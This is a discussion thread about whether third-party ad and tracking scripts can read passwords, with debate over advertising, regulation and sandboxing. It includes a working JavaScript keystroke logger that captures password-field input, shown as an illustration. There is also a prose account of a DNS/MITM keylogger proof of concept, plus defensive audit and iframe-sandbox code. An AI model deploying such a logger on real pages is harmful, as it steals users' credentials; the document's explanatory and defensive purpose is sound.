Can ads on a page read my password? (stackexchange.com)
327 points by linux2647 17 days ago | 134 comments

I really wish awareness of this reached a wider audience. Third-party advertising is a terrible blight on the web that has been allowed to grow and fester: it supplies no value and compromises both browser security and our peace of mind. Being bombarded by these things constantly is training most of us to ignore a lot more and focus on short, focused bursts of information...

IMO (and this is really deep into opinion) this has slowly been contributing to the lack of attention spans and the un-inquisitive response most people have when things on Facebook just straight out tell lies. Web advertising has such a feeble value for the cost it's exacting.

If ads were just images / text links I wouldn't ever bother using an adblocker. But because of pop-ups, insane amounts of JS abuse, auto-playing videos and browser exploits I just can't stand ads. At least ads in magazines flow with the content.

If you go to the Chase login page, it loads js from demdex.net.

DemDex "captures behavioral data on behalf of Websites and advertisers and stores it in a 'behavioral data bank.'"

uMatrix blocks it for me, but this shit could harvest banking credentials??


> this shit could harvest banking credentials??

It's not that it happens or could happen, the problem is that when credentials are leaked the user gets all the blame: "not our fault, you probably had a virus on your device", and most users will believe it.

We need a sort of GDPR law but not as... Broad or unclear as it is. The problem is big tech companies would never draft a bill that puts them in a bad spot. For the People has become For the Corporations and it really does suck.

GDPR is actually very narrow, specific and clear, as far as privacy laws go.

The only unclear thing is the distinction between processor, manager and collection of data. That's because it's narrow in scope.

Demdex is a DMP from Adobe that is used by companies to manage their first-party data so this particular example with Chase is very likely not an example of third-party ad serving abuse. Chase would have presumably put Adobe through a security review during an RFP process and would have no reason to harvest their own customers' login credentials. Their use case is probably something benign like wanting to segment customers for targeting based on their site usage patterns. Chase has different login pages but the one I'm looking at doesn't appear to have any third-party JS loading from advertisers.

> I really wish awareness of this reached a wider audience

1) it will not happen, not even Cambridge Analytica did and Facebook plans for more "privacy" took the media, Facebook did nothing or too little and now people think they are safer

2) People will not help make digital security and privacy any better, I can't explain why, but it must come from truly ethical developers

Privacy must be set by default. Ad tech companies have a conflict of interest in this privacy matter and can't lead the way. Developers from ad tech will always truly believe they are doing what's better for users but they just can't for many reasons.

Privacy by default is not a dream, it is not utopia, but it requires another business model. Ads will simply not allow privacy.

My opinion anyway

> 2) People will not help making digital security and privacy any better

The vast majority of Web users do not even realize how this stuff works. I asked one non-technical friend what he thought about Google's business model, and the answer surprised me: they positioned themselves as an intermediary on the Web so that most traffic goes through them so that they could serve ads. That's probably not completely incorrect, but what regular pops and moms don't know is that web site creators themselves agreed to this deal with the devil and their soul is now completely gone. When no one, not even the most valuable or knowledgeable customers, complains about the gazillions of tracking scripts on the page, there's no way this could get better. For regular people "Privacy" means a few settings that you could change on some conglomerate web site until they rebuild/reset the page so that you'll have to do this all over again.

>That's probably not completely incorrect

Far from it:

From https://revenuesandprofits.com/how-google-makes-money/ :

>68.3% of the total, from the advertising over the Google websites

>21.2% of the total, from advertising over the Google Network Member’ websites

I couldn't find a more up-to-date source, but judging from these numbers website creators are responsible for only around a fifth of Google's revenue.

It does provide value though. As much as I hate it most people don't want to pay for shit. So here we are.

I strongly disagree. I used to work on a MUD, the monthly run costs for that MUD came to $60. The MUD was free for anyone to play on - it had a website and forums and a server application to connect to via telnet. The cost for this came out of the fact that someone, somewhere needed to keep some servers running, and we needed to keep DNS working, the name registered... all of these ended up requiring three dedicated boxes which we got at a long term discounted rate because we knew a guy in a server farm where we could park our boxes.

Once upon a time it was a similar question if you wanted to run a hobbyist website, you needed a dedicated box somewhere or maybe to fork out 15/mo for some space on a shared host.

Nowadays that MUD could easily run on the smallest cloud instance you could find, with one less server, for a total of 10/mo. If you want to run a blog and tell the world about your intense interest in widget manufacturing there are cheap ways to host it; if the content is standard enough you might even be able to cut down the price to 10-20/yr.

It used to be that if you were so passionate about a topic you thought there needed to be a website about it then... you'd start it and host it yourself, it'd be an incidental cost that you'd just eat - then the mentality shifted to the assumption that your hosting of this thing should be profitable to you - you should get paid for maintaining such a site!

That's the real problem, people expect other people to pay for shit that nobody would pay for - since no one steps up to the "so reasonable" 10/mo subscription then ads are injected to make up for the "loss". If your site isn't valuable enough to get subscribers that doesn't mean it shouldn't exist, it just means that you should put up a donation page and treat any money you get out as an unbelievably strong endorsement of your decision to fund the existence of your little corner of the internet.

The company I work for has operating costs of $25MM+, we're a news site and would love to not have ads, but that's where 99% of our revenue comes from.

We break stories on corruption, injustice, and all kinds of other content. I think that running ads allowing us to do that would constitute as a benefit.

Sure but what we need is you to be able to be competitive serving ads yourselves from your own domain. Ideally, showing the exact same ads to everyone, just like a newspaper should.

It's not a criticism of you if you can't do that. It's where we need to be. Nobody opted in for all this surveillance. And there does also seem to be a lot of fraud in online advertising. Get everyone's phones and home routers running something like pi-hole and the whole advertising landscape would change for the better. Google would hate it, sure, but so what? You might find your ads are more valuable too, because seeing an ad in a genuine news source as context has more influence on a potential purchaser than seeing the exact same ad on john-does-racist-blog. Even if they are the exact same 2 eyeballs seeing both copies of the same ad.

Ads, sure. We're all basically fine with ads per se. Just not the current advertising arrangements involving reaming us with surveillance and all the other nasties as well. Didn't agree to it, don't want it, will block it and will proselytise ad blocking.

Every site owner is free to serve "virtual print ads" from their own domain out of the box and they will pass any ad-blocker there is. Ad-networks are free to provide server side SDKs to their customers.

It's high time to accept responsibility for content you're serving! (As it is, high profile sites often deny any liability for 99% of the traffic they are brokering. The ad-and-tracking inflation of recent years is just insane.)

> We're all basically fine with ads per se.

Speak for yourself. I'm pretty allergic to ads - stopped watching tv, reading newspapers etc. a decade ago. No way I accept ads on the web just because they are in more traditional formats.

You are fine with it by exercising your option to avoid them in the normal, rational and informed manner. Don't like watching TV ads? Don't watch commercial TV. Done. Clear, obvious, simple, rational and all consent is informed.

Newspapers ads - on paper - are text and graphics. No video, no code, no tracking. I think people are happy with that.

But ads on webpages - they're resource sucking privacy invading unvetted proprietary software. If your business requires you run those then you're getting blocked on every device I come into contact with forever.

I don't agree that doing one right thing (reporting on corruption) somehow makes it okay to do a wrong thing (not taking responsibility for the trackers you're exposing your visitors to). The fact that it pays for 99% of your fixed costs just says you are unlikely to start taking that responsibility any time soon. EDIT: I did not actually check your site and cannot confirm you host malicious ads. I wanted to make the general point; not attacking your site or work in any way.

Running ads, or tracking and selling visitors political views while also showing ads? I pay for ars technica who promises to turn off tracking and ads if you pay to subscribe and I wish other companies would do the same

or they could turn off all tracking because they're not evil. Just a thought.

I promise to stop punching you in the face if you pay me is not something I think is all that great to be honest. And then I'd have to trust them. But yeah, Ars Technica is not what it used to be since being bought by Conde Nast, right?

The difference is that you don't have to go on Ars Technica. Whereas you rarely choose to be punched in the face.

If the entry to a club was "either be punched in the face, or pay", I bet the majority of patrons would simply pay or go elsewhere. But on the internet, 99% of people either get punched or refuse both options and enter anyway.

Punched in the face, later, at our option or through our incompetence and we kept that secret from you and never got informed consent.

The analogy breaks down.

You aren't given the option, you wrote the option that websites and their 3rd party providers have to punch you without your knowledge. Stop reading Ars. Does that help you now you wrote that option? Maybe it does.

Better is to exercise your option to disrupt evil with uMatrix, pi-hole etc. Proselytise it. The less money there is in the evil, the less it happens. That's how we defeated popups, for example.

Hosting costs are a small part of operating costs, compared to paying a living wage for even a few writers.

The rundown on your costs assume that the site or service remains “unpopular” (as in not used by the majority of internet users). Costs scale pretty high if one finds themselves running a high-traffic site.

I am working under the (I think reasonable) assumption that if your thing actually manages to become popular then you can either share governance and costs with a committee of interested parties or actually justify a subscriber model, possibly semi-voluntary style like Patreon.

Neither helps in the short-term (say in the case of getting popular from a viral post where not living up to the momentum can mean losing out on the users), and while shared governance can work in a case where all parties have the same goal and are deep-pocketed, it has many risks when it comes to creative control and the user privacy/monetization scale. (What if someone had privately offered one of the MUD staff $500,000 to collect 'anonymous' data from users?)

I couldn’t agree more! I have a website for my personal projects (that occasionally gets a lot of traffic if a project winds up on HN or something) - it costs me about $10/mo to host completely ad-free, and probably only because I haven’t shopped around in like 6 years.

It is even worse with video, at least there are still plenty of websites made for love.

How many people do videos for purposes other than monetization?

Years ago I am sure that some people just wanted to share stuff with the world and get some feedback from like minded individuals.

People don't want to pay because most of the shit out there is shit. It's all supported by sensational headlines, controversial stories, fluff, and lies. If it all disappeared, we'd be left with things that exist because people care about it, things that are cheap to run, and things that are actually valuable enough to pay for. Can't be worse than the situation we have now, and you cut out a huge swath of parasites in the process.

>most people don't want to pay for shit

I’ve paid for news before and they still bloat their pages with ads to track me. It’s not a matter of people not wanting to pay. Customers are willing to pay for X and Y if and when it nets them a positive gain in their experience with a product. The problem is more about how these corporations are constantly making our experiences worse while also still tracking our every click.

Yeah, I'd actually be happy to pay... and I do for LWN, for example.

The problem is that publishers apparently(!) cannot properly distinguish between ad-driven revenue streams and good/loyal-customer revenue streams. (I don't know why this is even an issue, but here we are.)

Do NOT serve ads to your loyal revenue stream. Even if you can't make ends meet, do NOT do it. That will piss them off to no end, and they're your most loyal readers; they'll leave and never come back.

I asked someone in ad tech why “pay to remove the ads” is unheard of.

Think about it from the advertisers’ perspective:

You have a user base with a bunch of people. The ones that paid you to remove ads are, at least on average, wealthier than those that don’t. They certainly have disposable income.

In other words, the people that paid for a subscription are exactly the fraction of the audience the advertiser is paying for access to!

Of course, this argument falls apart for per-user targeted ads when ad blockers are prevalent. However, it makes perfect sense for display ads that are targeted based on content, or audience demographics, such as traditional mass media: tv, radio and newspapers.

In fact, the logic seems to extend to any website that is trying to charge an above-bottom-feeder premium for ad real estate.

How can it be claimed ads supply no value when lots of readers on this site rant about paywalls? People clearly are getting some kind of value from "free" ad-supported media.

I used to be editor-in-chief of my college newspaper. Most of our print ad revenue didn't actually come from direct sales. It came from national agencies that gave us insertion orders. I don't think we could have had a print edition based on our in-house ad sales.

Now imagine this problem for all kinds of other niche websites that can't afford to have their own ad sales teams... Suddenly it becomes clear why outsourcing ads generates a lot of value for cheapskate media consumers and for cash-strapped media organizations.

Back before HTTPS was prevalent, as a proof of concept, I set up a DNS server to redirect Google Analytics domains to an MITM server that added a keylogger and added some HTTP headers telling the browser to cache it as long as possible. The result was a keylogger that persisted on most sites (anything with GA), even after I connected to a non-compromised DNS server.

Fortunately this is no longer possible because of HTTPS, but I was able to convince some big sites to switch to HTTPS because of it.

That is pretty sinister actually. Totally something you could do anywhere people get 'free' wifi.

If you look at the second answer (https://security.stackexchange.com/a/214877/12942) it looks like the GA code Goodreads is using specifically will use http:// instead of https:// if the current page is http-only, so this would still work. There isn't a good reason to get third-party resources via http if https is available, even on non-https pages.

It's not a good reason, but it does avoid scary mixed-content warnings. Your (insecure) connection might not be secure!

How did you get clients to use your DNS server? Was it on a network where you controlled the router, or did you set up a WiFi base station that folks blindly connected to in public, or some other way?

I'm pretty sure you could do it with just ARP spoofing/poisoning (https://en.wikipedia.org/wiki/ARP_spoofing). No need to control any other node on the network.

Yes, I did it on my own network at the router level as a proof-of-concept. I didn't actually use it on other people, but the idea is that a malicious public network operator could do so and effectively install keyloggers on dozens of people per day.
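The subthread above describes two conditions that together make the cached-keylogger trick work: a third-party script fetched over plaintext http (so an on-path attacker can replace it), and a long Cache-Control lifetime (so the replaced copy outlives the hostile network). The following is an added example, not code from the thread or from any site named in it: a small audit that parses a page's script tags, resolves scheme-relative `//host/...` sources against the page's own scheme the way a browser would, and flags the combination of third-party, plaintext, long-lived cache and missing Subresource Integrity. The HTML, the page URL `http://bank.example/login`, and the response headers are constructed for illustration.

```python
import re
from urllib.parse import urljoin, urlparse

# Constructed sample page (not a real site): a plain-http login page pulling in
# an analytics tag via a scheme-relative URL, an ad tag over http, and the same
# ad tag over https with an integrity hash.
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="//www.google-analytics.com/analytics.js"></script>
<script src="http://cdn.example-ads.test/tag.js"></script>
<script src="https://cdn.example-ads.test/tag.js"
        integrity="sha384-abc" crossorigin="anonymous"></script>
</head><body><form><input type="password"></form></body></html>
"""

# Constructed response headers, keyed by the URL the browser would fetch.
SAMPLE_HEADERS = {
    "http://www.google-analytics.com/analytics.js": {
        "cache-control": "public, max-age=31536000",
    },
}

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(tag_body: str) -> dict:
    """Return the attributes of one <script ...> tag as a lowercase-keyed dict."""
    attrs = {}
    for m in ATTR.finditer(tag_body):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs


def cache_max_age(headers: dict) -> int:
    """Seconds a cached copy stays fresh per Cache-Control (0 if uncacheable/unknown)."""
    cc = headers.get("cache-control", "").lower()
    if "no-store" in cc:
        return 0
    m = re.search(r"max-age=(\d+)", cc)
    return int(m.group(1)) if m else 0


def audit_scripts(html: str, page_url: str, headers_by_url: dict) -> list:
    """List every external script on the page with the risks it carries."""
    page_host = urlparse(page_url).hostname
    findings = []
    for m in SCRIPT_TAG.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src")
        if not src:
            continue  # inline script: the page's own code, not a third-party fetch
        # urljoin gives "//host/x.js" the page's scheme, exactly as the browser does,
        # which is how a GA tag on an http page ends up fetched over http.
        url = urljoin(page_url, src)
        parsed = urlparse(url)
        third_party = parsed.hostname != page_host
        plaintext = parsed.scheme == "http"
        age = cache_max_age(headers_by_url.get(url, {}))
        issues = []
        if third_party and plaintext:
            issues.append("third-party script over plaintext http: any on-path "
                          "attacker can substitute it")
        if third_party and plaintext and age > 0:
            issues.append(f"a substituted copy would stay cached for {age}s, "
                          "surviving a move to a clean network")
        if third_party and "integrity" not in attrs:
            issues.append("no Subresource Integrity hash: a changed script is "
                          "accepted silently")
        findings.append({
            "url": url,
            "third_party": third_party,
            "plaintext": plaintext,
            "cache_seconds": age,
            "issues": issues,
        })
    return findings


if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_HTML, "http://bank.example/login", SAMPLE_HEADERS):
        print(f["url"])
        for issue in f["issues"]:
            print("   -", issue)
```

Run against the constructed page, the analytics tag comes back with all three findings (plaintext, one-year cache, no integrity), the http ad tag with two, the first-party script and the https-plus-integrity tag with none. On a real page, feed the function the HTML you fetched and the response headers of each script URL; the regex tag parsing is deliberately simple and will miss scripts injected at runtime by a tag manager, which is exactly the case a static check cannot see.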

You can't browse the web securely if you're being served third party ads. I'm not sure why this is considered acceptable and why the onus is always on the user to find and report the "bad" ads that a site owner has no control over, but it's really stupid.

I spent years browsing the web before there were any advertisements at all. There is no need for this garbage despite how many Stanford grads tell you it's totally necessary.

> I'm not sure why this is considered acceptable

Because ads make money to all parties except the user.

Worse, "Google Backdoor" (a/k/a "Tag Manager") lets third parties inject Javascript into your web pages. You can't even put Google's stuff into an IFRAME to sandbox it.[1] The Evil Empire does not like to be contained.

[1] https://adsense.googleblog.com/2011/06/clarifying-our-ad-imp...

And now Google is starting its move against ad blockers by first restricting them and then forbidding them (they will deny it). But it's for performance and speed because ad blockers are so bloated /s. And of course Google can't do evil because "Don't do evil" /s

That is the whole point of safe-frames, which are default in DFP.

>While SafeFrame shares information with ad content served to its API-enabled iframe, the publisher chooses what to share and can protect sensitive consumer information like personal email addresses, passwords, or even banking information.

Docs for DFP: https://support.google.com/admanager/answer/6023110?hl=en Spec: https://www.iab.com/guidelines/safeframe/

For people not in the adtech space: DFP is DoubleClick For Publishers, who initially served banner ads and were bought by Google in 2008. https://en.wikipedia.org/wiki/DoubleClick

Technical measures cannot be required to cover security holes. The holes must be closed. Otherwise it falls on users to audit all sorts of stuff they don't understand, and by users you can include developers.

This is not really a security hole. It's the intended behavior. Web developers (should) know that they are exposing all user behavior to the third-party code they bring in. The solution is to "not do that", but developers tend to choose convenience over safety, as do their clients, as do their clients' users.

Sounds like a great reason to block ads, if not all 3rd party scripts.

Even imagining a world in which all the major browser vendors had agreed to constrain browsers to a pure HTML+CSS+flash-like-extension-free web, someone would've eventually come out with a heavily funded 'next gen' browser with their flash/silverlight equivalent, and we'd either be in proprietary-land, or right back here with an open JS equivalent, post-backlash. Ship sailed and always would have.

And that's why we enlist regulators to protect the consumers. This isn't new, you're right.

What are you gonna regulate here, ban third party code? Good luck with that.

Why do you assume regulating = banning?

Well, what's the alternative then?

Elect sane and involved policy makers to keep a watch on the market. Impose regulations that make it harder to exploit the consumer, and hold those who break these policies accountable.

I suppose the whole ban vs regulate issue is a matter of granularity. Regulation does impose a set of banned practices, but it's not like you make it out to be, where all 3rd party code would have to be banned.

The main issue is that we need to agree on what we are actually capable of and interested in protecting, in an insanely fast-moving industry. This is why motivated and educated policy makers are crucial to the problem. There's still to this day nowhere near the level of discourse on this subject that's needed happening in places with the power to make a difference. Just like in the early days of the gold rush, I'm sure you could find countless cases of criminal shovel sellers.

But given the current ecosystem, this doesn't surprise me sadly. We (in the US) are locking kids up without parents for crimes they didn't commit. I suppose abusive or illegal ads aren't my biggest concern.

I'm sorry, I meant to ask: What's the alternative to banning third party JS? What's the actual regulation that should be enforced here? Do we ban specific behaviors of programs for third parties, but allow them for first parties? Make businesses pay for all the auditing?

Let me just say: I don't know what harebrained regulation would come out of this, but I'm pretty sure I don't want it.

> Elect sane and involved policy makers to keep a watch on the market.

That's not a solution, that's a fantasy scenario.

I'd like to see restrictions to what terms of service can permit. For example, it's one thing for me to be giving the 1st party some legal rights to collect information about me, it's another thing to allow essentially untrusted 3rd parties to collect as well. Some limits must be in place.

If this means some services are no longer viable because they can't make ad revenue, then maybe that's a good thing. Nothing is free, and we still live in the Wild West with companies getting away with monetizing our information behind our backs to subsidize the service. It's one thing to "pay" me for the time I watched your ad, it's another thing to "pay" me for a profile of my activity on the site or sites, which has enough information, generally, to uniquely identify me, and contains demographic and personal information determined by black boxes.

My point here might simply be, if it's my information, I should be entitled to know how it's actually being used.

But the first action I'd hoped to see is to make devices like the Amazon echo, and google home illegal.

> Probably the clearest example of a place where there's a reasonable expectation of privacy is in the home. A person doesn't have to be a homeowner for the law to protect that expectation; tenants who rent their homes also have a protected right to privacy. Moreover, invasion of privacy doesn't just mean that someone physically enters a place where a person has a reasonable expectation of privacy. It can also happen if someone uses electronic equipment to monitor or record what someone is doing in the home. [1]

This also goes for guests of your home, so as far as I'm concerned, Amazon (or my friend, or both) are/is breaking the law whenever I enter a home with one of these things installed. The regulation should demand a Amazon (in this example) to explicitly state how they are protecting my rights given the presence of an active microphone in the home. As things stand they are clearly not respecting our privacy.

Even Apple, who makes a point about how "Hey Siri" works isn't completely off the hook. I'd be interested in talking about Japan-esque laws requiring a sound to be played when Siri is activated, much like how a shutter noise must be played when a photo is taken.

The point here is, it's MY LIFE, I should at least know what's being done with it.

1: https://injury.findlaw.com/torts-and-personal-injuries/what-...

> For example, it's one thing for me to be giving the 1st party some legal rights to collect information about me, it's another thing to allow essentially untrusted 3rd parties to collect as well. Some limits must be in place.

In other words, if I defer any part of my services to a third party, I cannot do it anymore. Goodbye payment processing, fraud detection, spam/DDOS protection... the list is endless. Advertising is the least concern here.

See, that's the difficulty with regulation, you need to be very careful what is and isn't included. You don't want to accidentally prohibit crucial services. You don't want to burden business with liabilities by being vague. You don't want to leave too many loopholes or else your regulation does nothing but cause administrative overhead.

If you have so much faith in politicians to do a good job here, by all means, go out and lobby for this kind of regulation. Let's just say I don't share your optimism.

> My point here might simply be, if it's my information, I should be entitled to know how it's actually being used.

If you don't like your information being used for pretty much any purpose, don't give it to me. I can't preconceive of all the possible ways I am going to handle your data. Maybe I want to switch web hosts, or maybe I want to back it up somewhere else. Maybe I'm an idiot and I'll store it on a database with no password, exposed to the internet.

> This also goes for guests of your home...

Not necessarily. Depending on where this takes place, I don't have to disclose that you're being video or voice monitored. Maybe you don't like it that way, but those are my rights trumping yours.

> I'd be interested in talking about Japan-esque laws requiring a sound to be played when Siri is activated, much like how a shutter noise must be played when a photo is taken.

This is a good example of a pointless law. Sure, the cameras make a "shutter sound" when taking a photo, but they don't make a sound when recording video. When Siri activates, it does make sound, but if you want to activate it by voice, clearly it needs to listen all the time for the keyword (or whatever sounds like the keyword). There's no way around that.

So, what are you going to do, require bright flashing lights on all cameras/microphones?

umatrix makes it easy to disable all JS or all 3rd party JS:


You can combine it with custom CSS through stylus:


Do this. Do pi-hole too. But we shouldn't have to. If enough of us do maybe they'll stop all this 3rd party crap.

It shouldn't be up to users to audit every damn 3rd party url to protect themselves. You went to a single url the publisher of which should be completely responsible both morally and legally for all content. The end.

> It shouldn't be up to users to audit every damn 3rd party url to protect themselves. You went to a single url the publisher of which should be completely responsible both morally and legally for all content. The end.

In other words, shut down all businesses that rely on third party advertisement. Got it.

Absolutely if they're too stupid to move away from a broken (hopefully soon to be) unprofitable advertising model.

You are aware the advertising industry was immense before the web existed and there was no such thing as a third-party ad? Network television, cable, newspapers, magazines, billboards and so on. There is literally no reason for the internet not to be like that if we want it to be. Massively profitable for ads. Less bulls&^t surveillance. None, ideally. Yeah, bad for Google. I am entirely happy for Google to go bankrupt if they can't make money without surveillance that should be illegal and is immoral and for which they do not have informed consent. If you work there and get fired, I'm only slightly more sorry about that than I am if Philip Morris employees get fired as people stop smoking.

You 100% need surveillance in your business model and we shut that down, sure, go bankrupt. Good.

> You are aware the advertising industry was immense before the web existed and there was no such thing as a third party ad? Network television, cable, newspapers, magazines, billboards and so on.

Yes, this is called "the old media" and it is on the way out. Do you realize how hard it was to get advertisers on board with your publication in those days?

The whole point of profiling you as a user is to show you ads that make sense to show. There is nothing morally wrong with this. You want to use my service, I need you to tell me about yourself so that I can convince my advertisers that showing you an ad is worth something instead of nothing. You get an ad that is relevant to you, I get paid to run the service, and it all happens automatically.

If I instead had to pitch my service to advertisers to run first party ads, I would also have to convince them that my impression counts are accurate and that my target demographic is what I claim it is. How am I supposed to do that without an impartial third party? Am I supposed to survey my users, taking their precious time?

Of course this is all possible, but only for big companies. It's not CNN or Fox or even Google that is going to go bankrupt. They can adapt their model. For the upstarts, you'd be nipping them in the bud. The big guys will thank you for that.

Businesses used to rely on pop-up ads too, before browsers started to ban them.

If browsers ban JS in ads, HTML based ads will rise in value.

> If browsers ban JS in ads, HTML based ads will rise in value.

How are you going to detect what third-party JS is an ad? That's basically the job of an ad blocker. Do you expect Google to ship an ad blocker that blocks ads of its competitors? That'll be a great antitrust lawsuit.

Stupid question: why not make password-marked fields something that JS engines simply can't read from? I imagine it would stop you from client-side warnings of password insecurity, but is there a bigger problem?

> I imagine it would stop you from client-side warnings of password insecurity, but is there a bigger problem?

The bigger problem is that passwords aren't half the sensitive data on the web, they're just the example people are using because everybody knows they need to be protected.

If you protect the password from the script but it can still read your name and address, and your bank balance, and the private information you thought you were only sending to your spouse, have we actually solved the problem? No.

I imagine it would be pretty easy for the js to just remove the element from the DOM and replace it with a similarly styled input if all we are doing is stopping it reading the contents of the password input

It would kill any site with an AJAX-based login.

Twitter, AirBnb, Facebook, Google, Apple...

Yeah, posting a form to log in is the exception nowadays.

A good thing, imho.

I use JavaScript on some password fields for client-side password hashing (reasoning: https://security.stackexchange.com/a/201099/10863), but I agree that this might be a useful thing. I can think of a few ways this could work:

- Blacklist or whitelist access: <input type=password nojs> or <input type=password allowjs>

- Specifically set a method that is called upon form submission: <input type=password onsubmit=hashPassword> <script>function hashPassword(value){ ... }</script> The catch here is that the browser would have to error out on reassignment of the hashPassword global variable, since that is what malware would do. This sounds easy, but it might be quite a bit more complexity for the browser's JS engine, since it has to check every assignment in the global scope against a list of functions that are used for password fields.

- Only allow access from the code path starting with the form's onsubmit event, so <form onsubmit="return validate(this)">. The catch here is that most modern websites do $("#myform").onsubmit=function(){...} which any malware could do as well, so that would have to be disallowed. A lot of devs wouldn't be happy about that.

Though for backwards compatibility, the opt-in method would probably be the only candidate for actual implementation in the foreseeable future.

That's a tricky one, though - you're basically deciding for your users if their credentials will be at risk. As one of your users I'd rather make that call for myself...

You're always making that call, either client or server side.

They don't really have to read from it, they may just use the keydown event, for example.
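To make concrete what the comments about swapping out the input element and about keydown events describe, here is an added example (not code from the thread or from any site named in it): a page-level script that never touches `input.value` can still recover a password from key events, including characters the user typed and then deleted. The `installKeyLogger` part needs a browser DOM and is guarded so the file also runs under Node; the key sequence fed to `reconstructTyping` is constructed for the demo.

```javascript
// Added illustration: a script running in the host page (an ad network's
// loader, for instance) does not need to read input.value to learn a
// password. It can watch key events on the whole document in the capturing
// phase and rebuild the text, including characters that were typed and then
// backspaced away.

// Pure part: rebuild the field contents from a list of keydown events.
// Returns the final value plus every intermediate state, so "typed then
// deleted" characters are kept as well.
function reconstructTyping(events) {
  let value = '';
  const history = [];
  for (const ev of events) {
    if (ev.key === 'Backspace') {
      value = value.slice(0, -1);
    } else if (ev.key.length === 1 && !ev.ctrlKey && !ev.metaKey) {
      value += ev.key;            // printable character
    } else {
      continue;                   // Shift, Tab, Enter, arrows: ignore
    }
    history.push(value);
  }
  return { finalValue: value, history };
}

// Browser part: attach to the document, not to the field, so replacing the
// <input> element does not shake the listener off. Capturing phase means it
// runs before any handler the page itself installed.
function installKeyLogger(doc, report) {
  const byField = new Map();
  doc.addEventListener('keydown', (ev) => {
    const t = ev.target;
    if (!t || t.tagName !== 'INPUT' || t.type !== 'password') return;
    const events = byField.get(t) || [];
    events.push({ key: ev.key, ctrlKey: ev.ctrlKey, metaKey: ev.metaKey });
    byField.set(t, events);
    if (ev.key === 'Enter') report(t.name, reconstructTyping(events));
  }, true);
}

// Constructed key sequence: the user types "hunter2", decides the last
// character is wrong, deletes it and types "3".
const demoKeys = ['h', 'u', 'n', 't', 'e', 'r', '2', 'Backspace', '3']
  .map((key) => ({ key, ctrlKey: false, metaKey: false }));

if (typeof document !== 'undefined') {
  installKeyLogger(document, (name, r) => console.log(name, r));
} else {
  console.log(reconstructTyping(demoKeys));
}
```

The point for the "make password fields unreadable" proposals above is that the value is reconstructed without ever calling `.value`, and the intermediate `history` entries show why the "credentials you type and then delete" are exposed too.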

Capital One's site (which includes a login form) calls out to DoubleClick, Facebook, New Relic, something terrifyingly vague called xg4ken.com, and about a dozen other third parties.

One targeted compromise of any of these scripts would be catastrophic.

>calls out to DoubleClick, Facebook, New Relic, something terrifyingly vague called xg4ken.com, and about a dozen other third parties

Now imagine how many npm dependencies the backend or frontend has. How much do you trust marwahaha, yyx990803, or sokra?

Script inclusion is worse because you can decide what you send depending on IP, enabling targeted attacks. With npm you will have to upload the malware for all to see.

> xg4ken.com is a domain registered under Kenshoo inc.

Why did they register such a bizarre domain, that even calls out the exact owner? To avoid blocker-lists for all of 3 seconds? Why not a subdomain, or at least a domain that doesn't look like that?

Maybe they wanted their presentational site to run under a different domain than their ad/tracker distribution site so that engineers who unknowingly block their ads can still learn about their business.

And blocklist maintainers tend to immediately block root domains I guess. (At least I would if I saw an obscure subdomain from a party I want to block.)

I tried watching the recent US Democratic Party presidential debates on cnn.com and found out that it connects to at least 26 external domains, one of which was called summerhamster.com.

Just checked again and it seems to be the same.

For an example of how to do this with fewer compromises on security, check out Dropbox's homepage. They also call out to a dozen third parties, but the entry point for all the JS is a sandboxed <iframe>, mitigating the fallout if some of that JS becomes malicious.
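The pattern the comment above describes (third-party JS confined to a sandboxed <iframe>, with the host page only accepting structured messages from it) as an added example. This is not Dropbox's code, which I have not read; the hostnames are placeholders. The DOM parts only run in a browser, the helper functions are pure so the file also runs under Node.

```javascript
// Added example of the pattern: third-party scripts get their own origin and
// a sandboxed frame; the host page only accepts postMessage data whose origin
// and source window it verified. Host names are placeholders.

const TAG_ORIGIN = 'https://tags.example';      // where the 3rd-party bundle is served
const TAG_SRC = TAG_ORIGIN + '/loader.html';

// Compute the sandbox attribute. Never combine allow-scripts with
// allow-same-origin when the frame is same-origin with the host page: the
// framed script could then reach up and remove its own sandbox attribute.
function sandboxTokens(hostOrigin, frameSrc, { scripts = true, sameOrigin = false } = {}) {
  const frameOrigin = new URL(frameSrc).origin;
  if (scripts && sameOrigin && frameOrigin === hostOrigin) {
    throw new Error('allow-scripts + allow-same-origin on a same-origin frame defeats the sandbox');
  }
  const tokens = [];
  if (scripts) tokens.push('allow-scripts');
  if (sameOrigin) tokens.push('allow-same-origin');
  // deliberately no allow-top-navigation, allow-forms or allow-popups
  return tokens.join(' ');
}

// Without allow-same-origin the frame has an opaque origin, which the
// browser reports to the message listener as the string "null".
function expectedMessageOrigin(tokens) {
  return tokens.split(' ').includes('allow-same-origin') ? TAG_ORIGIN : 'null';
}

// Accept a message only if it came from our frame's window, from the origin
// we expect, and carries a structured payload with a type tag.
function isTrustedMessage(event, expectedSource, expectedOrigin) {
  return event.source === expectedSource
    && event.origin === expectedOrigin
    && event.data !== null && typeof event.data === 'object'
    && typeof event.data.type === 'string';
}

function mountThirdParty(doc, hostOrigin, onMessage, opts = {}) {
  const tokens = sandboxTokens(hostOrigin, TAG_SRC, opts);
  const frame = doc.createElement('iframe');
  frame.setAttribute('sandbox', tokens);
  frame.src = TAG_SRC;
  doc.body.appendChild(frame);
  const origin = expectedMessageOrigin(tokens);
  doc.defaultView.addEventListener('message', (ev) => {
    if (!isTrustedMessage(ev, frame.contentWindow, origin)) return;
    onMessage(ev.data);           // e.g. { type: 'impression', slot: 'top' }
  });
  return frame;
}

if (typeof document !== 'undefined') {
  mountThirdParty(document, location.origin, (msg) => console.log('from tag frame:', msg));
}
```

The frame gets no `allow-same-origin`, so even if its script is swapped for a malicious one it runs under an opaque origin with no access to the host DOM, cookies or storage; the only channel back is the message listener, which checks `source` and `origin` before touching the payload.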

A company with Dropbox level money should be able to write all of their front end code. It's disgusting that few top 500 companies do.

I don't think any of the third-party JS is for functionality. Many large companies call out to 3rd parties not because they don't want to write code, but because they're using marketing services so they can do things like re-target users for ad displays on other websites.

(also many top N companies do use 3rd party code, like React, but they usually re-host that themselves)

Dropbox doesn't appear to have the strongest developers on the client side, so perhaps that's true on the front end as well.

